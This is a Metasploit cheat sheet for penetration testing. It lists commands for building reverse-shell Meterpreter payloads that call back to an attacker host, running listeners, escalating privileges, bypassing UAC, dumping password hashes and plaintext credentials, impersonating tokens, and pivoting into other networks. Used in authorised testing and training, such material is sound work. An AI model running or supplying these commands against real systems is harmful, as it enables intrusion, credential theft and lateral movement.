The Metasploit Framework is an open-source penetration testing and ethical hacking tool developed by Rapid7. It provides a number of tools to exploit vulnerabilities in computer systems, networks and applications.
MSFVenom Commands
You can use MSFVenom to generate payloads that are compatible with Metasploit.
| Task | How | Notes |
|---|---|---|
| List MSFVenom payloads | msfvenom –list payloads | Shows supported payloads. Stageless payloads are designated with an underscore i.e windows/shell_reverse_tcp |
| Generate a Windows payload | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f exe > shell-win-x64.exe | Making sure the payload matches the target architecture is preferred. If a 32 bit payload is executed on a 64-bit host, you will need to migrate to a x64 process before extracting hashes. |
| Create a Linux Payload | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f elf > shell-lin-x64 |
Session Management
You can use the below commands to manage sessions.
| Task | How | Notes |
|---|---|---|
| Start a handler | use exploit/multi/handler set LHOST 172.23.168.66 set LPORT 6666 set ExitOnSession FALSE set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit -jz | LHOST can be set as an interface ID, such as eth0. ExitOnSession FALSE ensures the listener stays active after an initial shell. exploit -jz runs the listener as a background task. |
| Process Migration | post/windows/manage/migrate | Useful for stability, and to migrate from 32 to 64 bit processes. |
| Session management | sessions -i sessions -b sessions -u | -i interacts with a sessions -b places a session in the background -u upgrades a standard reverse shell to a Meterpreter shell |
| Channel management | channel -i channel -l | -i interacts with a channel -l lists available channels |
| Jobs | jobs -l jobs -k | Jobs are background tasks. They can be viewed with jobs -l, and killed with jobs -k |
Privilege Escalation
Some useful modules for common
| Task | How | Notes |
|---|---|---|
| Enumerate privileges | getprivs | Will show the currently active user privileges. |
| Abuse weak service permissions | use exploit/windows/local/service_permissions | |
| Exploited unquoted service paths | exploit/windows/local/unquoted_service_path | |
| Search for vulnerabilities that may lead to privilege escalation | post/multi/recon/local_exploit_suggester | |
| List installed applications | post/windows/gather/enum_applications | |
| Exploit systems that have AlwaysInstallElevated set | exploit/windows/local/always_install_elevated | |
| Bypass UAC | exploit/windows/local/bypassuac | |
| Identify local AV Exclusions | post/windows/gather/enum_av_excluded |
Credentials
Commands for extracting credentials.
| Task | How | Notes |
|---|---|---|
| Dump SAM database | As an administrative user: getsystem hashdump | Hashes can be cracked, or used for pass the hash attacks. |
| Extract other credentials | load kiwi creds_all | May include plaintext credentials on older versions of Windows. |
| User Impersonation | load incognito list_tokens -u impersonate bordergate.local\Administrator getuid | Use rev2self to revert to previous user context. |
| Extract Unattend.xml credentials | use post/windows/gather/enum_unattend | |
| Search for credentials | search -f *.ppk | Example looks for putty key files. |
| Group Policy Preference file extraction | post/windows/gather/credentials/gpp | For a domain connected system. |
Pivoting
The next set of commands helps identify other hosts and networks that you can attack.
| Task | How | Guidance |
|---|---|---|
| Add routes | run autoroute -s 192.168.19.0/24 | Use “run autoroute -p” to view active routes. |
| Configure a SOCKS proxy | use auxiliary/server/socks_proxy set VERSION 4a set SRVPORT 9050 run | This should match the values you have configured in /etc/proxychains4.conf. To use the proxy: proxychains -q nmap -Pn -n -F -sT 192.168.1.1 |
| Port forward to destination | meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.1 | Forwards port 8080 on Kali system to port 80 on 192.168.1.1. |
| Ping sweep | use multi/gather/ping_sweep set RHOSTS 192.168.1.0/24 set SESSION 1 run | A quick way of mapping new subnets. |
| ARP Scan | run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 | ARP Scan local subnet. |
| Review Network Configuration | ipconfig netstat | Looking for active connections which may indicate trust relationships between hosts. Review previously unidentified subnets. |
| Portscan (via Pivot) | use auxiliary/scanner/portscan/tcp | Make sure routes are added with autoroute before hand. |
| Reverse DNS Lookup | multi/gather/dns_reverse_lookup | Useful for finding new routed targets. |
Metasploit Database
You can use the database to store scan results, credentials, and loot.
| Task | How | Guidance |
|---|---|---|
| Initialise the database | systemctl start postgresql sudo msfdb init msf6 > db_status | Required to start using Metasploit database functionality |
| Configure a workspace | Add a new workspace: workspace -a myworkspace List workspaces: workspace Change workspaces: workspace | Workspaces provide separation between data in separate tests |
| Nmap scanning | db_nmap -sV -A | Scan using standard Nmap arguments and store the results in the postgres database. |
| List database contents | hosts services | For listed hosts and service respectively. |
| Export database contents | services -o /tmp/services.txt hosts -o /tmp/hosts.txt | Export hosts or services to a text file. |
| Set RHOSTS | services -p 445 -R | The example command will set RHOSTS for any systems with port 445 open. This is very useful when combined with RC scripts. |
Scripting
| Task | How | Guidance |
|---|---|---|
| Save commands | makerc /tmp/commands.rc | Saves executed commands to a file. |
| Execute saved commands | msfconsole -r /tmp/commands.rc | Runs save commands. |
Search Commands
Searching for generic terms often results in way too many results. Using search filters reduces the amount of output returned.
| Task | How | Guidance |
|---|---|---|
| Search for exploits only | search type:exploit name:tomcat | Type could be exploit,post,auxiliary |
| Filter by platform | search platform:windows name:gather | |
| Remove unwanted results | grep -v DoS grep -v local search type:exploit name:tomcat | The grep needs to be placed before the search command. |